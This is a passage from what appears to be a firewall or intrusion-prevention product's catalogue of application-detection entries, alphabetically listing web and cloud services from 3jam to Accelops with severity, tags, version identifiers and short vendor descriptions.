First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: 3jam's solution virtualized text messaging so that people could send and receive text messages using their phone number from anywhere and were no longer locked to their mobile phone for text messaging.
Back to top

3manager

About this situation: Application 3manager detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: 3manager provide software to optimization printer cost. Take control of printer costs and printer procurement requirements with 3manager - the printer optimization and analysis software. This cost optimization software monitors your company's printing usage and analyzes the efficiency of your equipment.
Back to top

3P-Works

About this situation: Application 3P-Works detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: 3P Works is a cloud based project portfolio management solution. Centralize projects, optimize resources, and increase on-time delivery of work.
Back to top

3Play-Media

About this situation: Application 3Play-Media detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: 3Play Media provides captioning, transcription, and translation services, interactive transcripts and video search tools.
Back to top

3plcentral

About this situation: Application 3plcentral detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: 3PL Central provides Cloud-based warehouse management software (WMS) for 3PLs, public warehouses and warehouse operations.
Back to top

3pmobile

About this situation: Application 3pmobile detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: 3PMobile software uses the browser to deliver real-time context to your Web server for use in any Web application.
Back to top

3scale

About this situation: Application 3scale detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1160-5242
Description: 3scales API Management platform is a provider of the tools you need to take control of your API.
Back to top

40Nuggets

About this situation: Application 40Nuggets detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1160-5242
Description: 40Nuggets develops a tool that enables website owners to send timely messages and engage with their website visitors.
Back to top

42Goals

About this situation: Application 42Goals detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: 42goals is a simple tool for tracking your daily goals and keeping a log of your daily activities. You can set any number of goals and track them every day.
Back to top

43-Things

About this situation: Application 43-Things detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Social Networking, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: 43 Things is a social networking website established as an online goal setting community. It is built on the principles of tagging, rather than creating explicit interpersonal links
Back to top

451-Research

About this situation: Application 451-Research detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: 451 Research, a division of global analyst and data company The 451 Group, is focused on the business of enterprise IT innovation.
Back to top

4chan

About this situation: 4chan usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-603-5211
Last changed: sgpkg-ips-816-5242
Description: 4chan is an English-language imageboard website. Source: Wikipedia
Back to top

4filehosting

About this situation: 4FileHosting usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A file-sharing service that allows users to upload/download files over the web.
Back to top

4imprint

About this situation: Application 4imprint detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Promotional products by 4imprint. Find the perfect promotional items for business branding, saying thanks, or spreading the word. With over 30,000 promotional items for your corporate marketing campaign, you get big time product selection and the personal service you expect.
Back to top

4projects

About this situation: Application 4projects detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: 4Projects proven SaaS web-based project collaboration tool
Back to top

4remotesupport

About this situation: 4RemoteSupport usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Remote control, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: 4RemoteSupport provides remote access to computers connected to the internet.
Back to top

4Shared

About this situation: 4Shared usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, File Sharing, Application Routing
First detected in: sgpkg-ips-392-4219
Last changed: sgpkg-ips-628-5211
Description: 4Shared is an online file sharing and storage service.
Back to top

4sync

About this situation: 4sync usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Storage, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: 4sync provides users with 15 GB for storage of pictures, music, video, documents and other types of files.4Sync supports Microsoft Windows, Mac OS, and also available for iPhone, iPad, Android, BlackBerry and Symbian. 4sync for mobile allows owners of mobile phones to get direct access to the 4Sync accounts.
Back to top

4tube

About this situation: 4tube usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-560-5211
Last changed: sgpkg-ips-628-5211
Description: 4tube is an adult video streaming service.
Back to top

500px

About this situation: Application 500px detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: 500px is a photo community for discovering, sharing, buying and selling the highest quality photography.
Back to top

51

About this situation: Application 51 detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Social Networking, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: 51 games is community-based web game platform, set game R and D operations, real friends, blog space, anchor entertainment business as a whole.
Back to top

51.com

About this situation: 51.com usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-549-5211
Last changed: sgpkg-ips-630-5211
Description: 51.com is a free-access Chinese social networking website that is operated and privately owned by 51.com Inc.
Back to top

51.com-Bulletin-Board

About this situation: 51.com Bulletin Board usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-560-5211
Last changed: sgpkg-ips-630-5211
Description: 51.com is a free-access Chinese social networking website that is operated and privately owned by 51.com Inc. This application detects 51.com Bulletin Board usage.
Back to top

51.com-Mail

About this situation: 51.com mail usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Mail, Application Routing
First detected in: sgpkg-ips-549-5211
Last changed: sgpkg-ips-630-5211
Description: 51.com is a free-access Chinese social networking website that is operated and privately owned by 51.com Inc. This application detects 51.com email usage, including accessing mail box, checking received messages and replying to messages.
Back to top

51.com-Posting

About this situation: 51.com posting detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-549-5211
Last changed: sgpkg-ips-630-5211
Description: 51.com is a free-access Chinese social networking website that is operated and privately owned by 51.com Inc. This application detects posting to the 51.com website, including blog and diary publishing/editing and photo publishing.
Back to top

51.com-Web-Disk

About this situation: 51.com Web Disk usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Storage, Application Routing
First detected in: sgpkg-ips-549-5211
Last changed: sgpkg-ips-932-5242
Description: 51.com is a free-access Chinese social networking website that is operated and privately owned by 51.com Inc. This application detects 51.com Web Disk usage, including events such as uploading, downloading, modifying or deleting a file and creating or moving a folder.
Back to top

5pm

About this situation: 5pm usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-1764-5242
Description: 5pm is a web-based project and task management software which has a smart customizable interface.
Back to top

71lbs

About this situation: Application 71lbs detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1160-5242
Description: 71 Pounds is a software company, develops shipping management tools for small and medium businesses to automatically audit and collect their late delivery shipping refunds.
Back to top

7Geese

About this situation: Application 7Geese detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: 7Geese is a social performance management software that empowers employees to better achieve goals, get recognized, and receive continuous feedback in an engaging social environment using OKRs.
Back to top

7Segments

About this situation: Application 7Segments detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: 7SEGMENTS processes your big data, gets insights, runs campaigns, data-mine knowledge.
Back to top

7shifts

About this situation: Application 7shifts detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: 7shifts is an employee scheduling and management software designed for the restaurant industry.
Back to top

80legs

About this situation: Application 80legs detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: 80legs platform runs on distributed grid computing system, this architecture provides unparalleled web crawling and data collection capabilities at affordable costs.
Back to top

81dash

About this situation: Application 81dash detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: 81Dash - dashboard that allows communicate, share files, take notes, and keep track of important tasks.
Back to top

88flow

About this situation: Application 88flow detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: 88flow is a cashflow management tool for small business.
Back to top

8am

About this situation: Application 8am detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1160-5242
Description: 8am web is a web-based project and task management software that includes tools with calendars, tasks, events, team discussions and more.
Back to top

8Card

About this situation: Application 8Card detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Eight is the cloud business card app. You can share your company info and build your business card database Your business network.
Back to top

8tracks

About this situation: 8Tracks usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-1764-5242
Description: This site allows users to access an internet radio and social networking site for streaming user-curated playlists consisting of at least 8 tracks; the playlists can be shared with other users. Source: Wikipedia
Back to top

8x8

About this situation: Application 8x8 detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: 8x8, Inc. offers cloud-based voice, video and mobile unified communications solutions for small to medium-sized business and distributed enterprise customers.
Back to top

99designs

About this situation: 99designs usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: 99designs is an online graphic design marketplace that enables customers to quickly source graphic design work.
Back to top

99tests

About this situation: Application 99tests detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: 99Tests is a crowd-sourcing platform to get software products tested in the cloud by top notch testing professionals.
Back to top

9cast.net

About this situation: 9cast.net usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-559-5211
Last changed: sgpkg-ips-1764-5242
Description: A web-based video-streaming/IP-TV service where users can watch videos and/or live TV using just a web browser.
Back to top

9GAG

About this situation: 9GAG usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Social Networking, Application Routing
First detected in: sgpkg-ips-603-5211
Last changed: sgpkg-ips-623-5211
Description: 9GAG is an online platform, and a social media website whereby users upload and share user-generated images, videos, and GIFs. Source: Wikipedia
Back to top

9Lenses

About this situation: Application 9Lenses detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: 9Lenses is a digital consulting platform, helps consultants win new business, improve the quality of insight, and increase connectivity.
Back to top

a-la-mode

About this situation: Application a-la-mode detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: a la mode, inc. Is a mission-critical workflow technology, solving digital supply chain and data gathering problems in one of the broadest sectors of the financial services industry.
Back to top

A-Systems-JobView

About this situation: Application A-Systems-JobView detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: A-Systems JobView is a construction accounting software with general ledger, cash management, accounts payable, contact manager, accounts receivable, job costing, payroll, purchase orders, inventory, POS, electronic data import, and a custom report writer.
Back to top

a.k.a.

About this situation: Application a.k.a. detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: a.k.a.
Back to top

A2-Hosting

About this situation: Application A2-Hosting detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: A2 Hosting is high performance web hosting provider. Our range of fast hosting products range from Shared, VPS Hosting, Cloud VPS, Managed VPS, Reseller and Dedicated servers.
Back to top

A2000-Software

About this situation: Application A2000-Software detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: A2000 Global is a web enabled Oracle ERP Fashion Solution that includes all functionalities modules in one solution and one database.
Back to top

A2Z-Manager

About this situation: Application A2Z-Manager detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: A2Z is a quality assurance software for gauge calibration, recall, asset management, inspection and measurement, measurement systems analysis
Back to top

A2zapps

About this situation: A2Zapps usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: This collection offers a variety of enterprise applications for the workplace. Source: Wikipedia
Back to top

A3-Modeling

About this situation: Application A3-Modeling detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: A3 Modeling integrates all your budgeting, forecasting, consolidations and KPI dashboards in a unified application that consolidates in real-time. A3 Modeling in the Cloud has flexibility while delivering the substantial cost savings, labor efficiencies and conveniences of allowing us to host your solution.
Back to top

A7Pro

About this situation: Application A7Pro detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: A7Pro is a Digital Asset Management combination of software solutions and workflow best practices transforming traditional storage practices into an efficient and secure system.
Back to top

aACE-Business-Suite

About this situation: Application aACE-Business-Suite detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: aACE is business management software, allowing you to efficiently manage your operations in a single complete, cross-platform solution.
Back to top

Aamulehti

About this situation: Aamulehti usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Media, Application Routing
First detected in: sgpkg-ips-601-5211
Last changed: sgpkg-ips-628-5211
Description: Aamulehti is a Finnish daily newspaper.
Back to top

Aardvark

About this situation: Aardvark usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: Aardvark connects users live with friends or friends-of-friends who are able to answer their questions.
Back to top

Aarki

About this situation: Aarki usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-1764-5242
Description: Aarki delivers advertising technology where user can build own advertise.
Back to top

AARP

About this situation: Application AARP detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AARP is a non-governmental organization and interest group. It operates as a non-profit advocate for its members.
Back to top

AARP-Provider-Online-Tool

About this situation: Application AARP-Provider-Online-Tool detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AARP is a UnitedHealthcares online provider tool, a resource available to physicians and healthcare professionals serving consumers with UnitedHealthcare Medicare Supplement and Hospital Indemnity Plans that carry the AARP name.
Back to top

Aavaz

About this situation: Application Aavaz detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Aavaz is a web based, virtual, outbound, inbound and blended calling solution for a small and medium businesses and call centers wanting simple and convenient caller management.
Back to top

Aaztec-Signage-Suite

About this situation: Application Aaztec-Signage-Suite detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Aaztec Solution is a provider of Digital Signage Solutions to companies around the world.
Back to top

AB-Tasty

About this situation: Application AB-Tasty detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AB Tasty provides a feature-packed solution to run all kinds of A/B and multivariate tests.
Back to top

Ababil

About this situation: Application Ababil detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Ababil is a banking system developed with the specifics of Islamic culture in mind and focus on profit sharing instead of interest collection.
Back to top

Abacus

About this situation: Application Abacus detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1160-5242
Description: Abacus is a real-time expense management and reporting software that features deposit reimbursements, creation of expenses from receipt images, expense policy automation, direct integrations, connecting with card programs, real-time insights, multi-level approval hierarchy, customization of expense fields, data storage, corporate card management and reconciliation, and online and live chat support.
Back to top

Abak-Time-and-Billing

About this situation: Application Abak-Time-and-Billing detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Abak360 is a complete solution which centralizes timesheets, expenses, invoicing, project costs management, resource planning and document management in one package.
Back to top

AbanteCart

About this situation: Application AbanteCart detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AbanteCart is an open source ecommerce platform based on PHP for small to medium businesses.
Back to top

ABB

About this situation: Application ABB detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ABB provides technologies for smart grids, robotics, electric cars, renewable energy and motors.
Back to top

Abebooks

About this situation: AbeBooks usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: AbeBooks provides millions of new and used books, rare books and out of print books.
Back to top

ABECAS-Insight-Cost-Accounting

About this situation: Application ABECAS-Insight-Cost-Accounting detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Argos Software develops, markets and supports Enterprise Software for Agribusiness and Supply Chain.
Back to top

ABELDent

About this situation: Application ABELDent detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ABELDent provides software solutions for dentists practice.
Back to top

AbiClould

About this situation: Application AbiClould detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1160-5242
Description: AbiCloud helps you to easily collect and organize all the information and pictures for your degree.
Back to top

Abila

About this situation: Application Abila detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Abila develops software solutions for nonprofit and governmental organizations. It helps to streamline accounting, donor and grant management and large scale fundraising processes.
Back to top

ABIS-Pro

About this situation: Application ABIS-Pro detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ABIS Pro is a knowledge based cost management is fundamental to good decision making. Without timely and updated information on costs, companies end up making highly subjective and ad-hoc decisions.
Back to top

AbleCommerce

About this situation: Application AbleCommerce detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AbleCommerce is a fully featured eCommerce shopping cart system for ASP.net. Choose a secure PCI Certified .net shopping cart to create your online store.
Back to top

Abledoc

About this situation: Application Abledoc detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Abledoc lets easy access to your documents from the internet. Route items between people to improve productivity and reduce costs.
Back to top

AbleTrend

About this situation: Application AbleTrend detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AbleSys trading software provides specific market direction, key support
Back to top

Abortion

About this situation: Sites with neutral or balanced presentation of the issue.
Context: URL Application Context
Severity: 1
Tags: Abortion, Productivity Loss
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites with neutral or balanced presentation of the issue.
Back to top

About-Me

About this situation: About.me usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: About.me is an online platform enabling users to create and maintain a curated page for self-expression.
Back to top

Abraxas

About this situation: Application Abraxas detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: The Abraxas computer science AG is an experienced Swiss ICT companies with a broad range of services to public administrations and organizations in the public environment as well as for medium-sized companies. In the areas of IT services, business applications, integration solutions and process consulting Abraxas provides customers with all relevant services from a single source. Abraxas consulting to application development and implementation to infrastructure deployment and operational services.
Back to top

Abraxsys

About this situation: Application Abraxsys detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Abraxsys is an integrated and comprehensive banking solution covering centralized accounting, corporate and retail banking, treasury, payments, internet banking, business information and compliance.
Back to top

Absolute-Manage

About this situation: Absolute Manage usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous
First detected in: sgpkg-ips-634-5211
Last changed: sgpkg-ips-1433-5242
Description: Absolute Manage (formerly LANRev) is a system life-cycle management software which is used by the system administrators to automate IT administration tasks. It allows the administrators to control computers, terminate troublesome processes, execute utility scripts, auto install software, monitor software installations and usage, manage the configuration and security, restart computers and much more.
Back to top

Absolute-Return-Capital

About this situation: Application Absolute-Return-Capital detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ARC manages assets in fixed income, equity, commodity, and currency markets to produce attractive risk-adjusted returns while maintaining low correlation to traditional and other alternative nvestments.
Back to top

AbsoluteBackground

About this situation: Application AbsoluteBackground detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Absolute Background Search provides employment screening services such as Credit Reports, Criminal Records, SSN traces and MVR Records.
Back to top

absoluteBUSY

About this situation: Application absoluteBUSY detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: absoluteBUSY is a web based CRM solution for contact management, marketing and sales support, project tracking and other CRM related tasks.
Back to top

Absorb-LMS

About this situation: Application Absorb-LMS detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Absorb LMS is a learning management system for businesses and higher education institutes.
Back to top

Abstract blacklisting request

About this situation: Abstract blacklisting request
Context: Engine situations
Severity: 1
Tags: NGFW
First detected in: sgpkg-ips-450-4333
Last changed: sgpkg-ips-1531-5242
Description: Abstract blacklisting requested from $([[$LN_BLACKLISTER]]/resolved)
Back to top

Abused Drugs

About this situation: Sites that promote or provide information about the use of prohibited drugs, except marijuana, or the abuse or unsanctioned use of controlled or regulated drugs; also, paraphernalia associated with such use or abuse.
Context: URL Application Context
Severity: 1
Tags: Drugs, Productivity Loss
First detected in: sgpkg-ips-799-5211
Last changed: sgpkg-ips-1531-5242
Description: Sites that promote or provide information about the use of prohibited drugs, except marijuana, or the abuse or unsanctioned use of controlled or regulated drugs; also, paraphernalia associated with such use or abuse.
Back to top

Academic-Earth

About this situation: Application Academic-Earth detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Academic Earth provides online courses, lectures, and videos from top universities like Yale, Stanford, MIT, and more.
Back to top

Academy10

About this situation: Application Academy10 detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: SkillGate's Academy10 learning management system
Back to top

Acadre

About this situation: Application Acadre detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Acadre is a role-based and process-supportive case and content management solution for municipalities. Integrates with SharePoint.
Back to top

Acapela-Group

About this situation: Application Acapela-Group detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Acapela Group invents speech solutions to vocalize content with authentic and original voices that bring more meaning and intent.
Back to top

ACAtrac

About this situation: Application ACAtrac detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ACAtrac provides streamlined data gathering capability with stand-alone or integrated flexibility
Back to top

Acaveo

About this situation: Application Acaveo detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Acaveo provides a software platform for a new category of storage and information governance software identified by analyst firms as File Analysis.
Back to top

Accalio-ECM

About this situation: Application Accalio-ECM detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Accalio ECM features such as document management
Back to top

AccelerationATS

About this situation: Application AccelerationATS detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AccelerationATS is a web-based ATS that offers resume parsing, candidate ranking and scoring, interview scheduling, email alerts, onboarding, etc.
Back to top

Accellion

About this situation: Application Accellion detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Accellion Inc. is the leading provider of secure mobile collaboration and on-premise private cloud file sharing solutions that enable increased business productivity and ensure data security and compliance.
Back to top

Accellos

About this situation: Application Accellos detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Accellos is a provider of software solutions specifically designed for the unique needs of logistics service providers and midsized businesses. Accellos provides solutions for warehouse management systems
Back to top

Accelo

About this situation: Application Accelo detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Accelo is a software service automation
Back to top

Accelops

About this situation: Application Accelops detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
